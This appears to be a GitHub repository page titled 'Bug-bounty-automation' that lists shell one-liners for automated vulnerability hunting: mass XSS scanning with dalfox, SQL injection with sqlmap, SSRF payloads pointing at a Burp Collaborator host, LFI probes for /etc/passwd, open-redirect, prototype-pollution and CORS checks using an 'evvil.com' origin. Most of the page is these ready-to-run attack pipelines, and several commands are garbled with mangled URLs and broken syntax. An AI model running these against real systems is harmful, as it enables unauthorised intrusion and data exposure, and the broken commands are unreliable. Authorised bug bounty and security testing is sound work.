Skip to content

Al-Baradi-Joy/Bug-bounty-automation

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

1 Commit
ย 
ย 

Repository files navigation

๐—๐’๐’ โชผ

cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ cat targets.txt | getJS | httpx --match-regex "addEventListener((?:'|")message(?:'|")"

๐’๐๐‹๐ข โชผ

httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

๐’๐’๐‘๐… โชผ

findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace ๐˜ฉ๐˜ต๐˜ต๐˜ฑ:https://๐˜ ๐˜–๐˜œ๐˜™.๐˜ฃ๐˜ถ๐˜ณ๐˜ฑ๐˜ค๐˜ฐ๐˜ญ๐˜ญ๐˜ข๐˜ฃ๐˜ฐ๐˜ณ๐˜ข๐˜ต๐˜ฐ๐˜ณ.๐˜ฏ๐˜ฆ๐˜ต

๐‹๐…๐ˆ โชผ

gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

๐Ž๐๐„๐ ๐‘๐„๐ƒ๐ˆ๐‘๐„๐‚๐“ โชผ

gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

๐๐‘๐Ž๐“๐Ž๐“๐˜๐๐„ ๐๐Ž๐‹๐‹๐”๐“๐ˆ๐Ž๐ โชผ

subfinder -d https://target.com | httpx -silent | sed 's/$//?proto[testparam]=exploit//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"

๐‚๐Ž๐‘๐’ โชผ

gau https://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

๐„๐ฑ๐ญ๐ซ๐š๐œ๐ญ .๐ฃ๐ฌ โชผ

echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 assetfinder https://vuln.target.com | waybackurls | grep -E ".json(?:onp?)?$" | anew

๐„๐ฑ๐ญ๐ซ๐š๐œ๐ญ ๐”๐‘๐‹๐ฌ ๐Ÿ๐ซ๐จ๐ฆ ๐œ๐จ๐ฆ๐ฆ๐ž๐ง๐ญ โชผ

cat targets.txt | html-tool comments | grep -oE '\b(https?|http):https://[-A-Za-z0-9+&@#/%?=_|!:,.;]*[-A-Za-z0-9+&@#/%=_|]'

๐ƒ๐ฎ๐ฆ๐ฉ ๐ˆ๐ง-๐ฌ๐œ๐จ๐ฉ๐ž ๐€๐ฌ๐ฌ๐ž๐ญ๐ฌ ๐Ÿ๐ซ๐จ๐ฆ ๐‡๐š๐œ๐ค๐ž๐ซ๐Ž๐ง๐ž โชผ

curl -sL ๐˜ฉ๐˜ต๐˜ต๐˜ฑ๐˜ด:https://๐˜จ๐˜ช๐˜ต๐˜ฉ๐˜ถ๐˜ฃ.๐˜ค๐˜ฐ๐˜ฎ/๐˜ข๐˜ณ๐˜ฌ๐˜ข๐˜ฅ๐˜ช๐˜บ๐˜ต/๐˜ฃ๐˜ฐ๐˜ถ๐˜ฏ๐˜ต๐˜บ-๐˜ต๐˜ข๐˜ณ๐˜จ๐˜ฆ๐˜ต๐˜ด-๐˜ฅ๐˜ข๐˜ต๐˜ข/๐˜ฃ๐˜ญ๐˜ฐ๐˜ฃ/๐˜ฎ๐˜ข๐˜ด๐˜ต๐˜ฆ๐˜ณ/๐˜ฅ๐˜ข๐˜ต๐˜ข/๐˜ฉ๐˜ข๐˜ค๐˜ฌ๐˜ฆ๐˜ณ๐˜ฐ๐˜ฏ๐˜ฆ_๐˜ฅ๐˜ข๐˜ต๐˜ข.๐˜ซ๐˜ด๐˜ฐ๐˜ฏ?๐˜ณ๐˜ข๐˜ธ=๐˜ต๐˜ณ๐˜ถ๐˜ฆ | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]

๐…๐ข๐ง๐ ๐ฅ๐ข๐ฏ๐ž ๐ก๐จ๐ฌ๐ญ/๐๐จ๐ฆ๐š๐ข๐ง/๐š๐ฌ๐ฌ๐ž๐ญ๐ฌ โชผ

subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

๐’๐œ๐ซ๐ž๐ž๐ง๐ฌ๐ก๐จ๐ญ โชผ

assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published